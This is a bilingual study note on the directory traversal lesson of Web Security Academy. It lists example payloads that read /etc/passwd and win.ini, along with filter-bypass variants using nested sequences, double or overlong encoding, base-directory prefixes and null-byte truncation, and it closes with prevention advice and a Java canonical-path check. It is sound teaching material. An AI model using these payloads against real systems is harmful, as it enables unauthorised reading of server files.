这篇是Web Security Academy的Directory traversal部分
原文:What is directory traversal, and how to prevent it?
Reading arbitrary files
- On Unix-based operating systems
https://insecure-website.com/loadImage?filename=../../../etc/passwd
- On Windows, both ../ and ..\ are valid directory traversal sequences
https://insecure-website.com/loadImage?filename=......\windows\win.ini
Common obstacles to exploiting file path traversal vulnerabilities
-
绝对路径, such as filename=/etc/passwd, to directly reference a file without using any traversal sequences.
-
嵌套路径, such as ….// or ….\/, which will revert to simple traversal sequences when the inner sequence is stripped.
-
用非标准的编码, such as ..%c0%af or ..%252f, to bypass the input filter.
URL : %252f => %2f => /
%c0%af 是非法的UTF-8表示形式
-
如果应用要求用户输入以固定基本目录开头, such as /var/www/images,就可能造成绕过. For example:
filename=/var/www/images/../../../etc/passwd
-
如果要求用户输入是特定结尾, 如 .png, 就可用空字节在所需扩展名之前有效地终止文件路径(00截断)
filename=../../../etc/passwd%00.png
How to prevent a directory traversal attack
防止文件路径遍历漏洞的最有效方法是避免将用户提供的输入全部传递给文件系统API ,如果不能避免则有两种应对方式:
-
处理输入前先检查
比如只允许输入字母数字字符
-
验证提供的输入后规范化路径
下面是一些简单Java代码的示例,用于根据用户输入验证文件的规范路径:File file = new File(BASE_DIRECTORY, userInput);
if (file.getCanonicalPath().startsWith(BASE_DIRECTORY)) {
// process file
}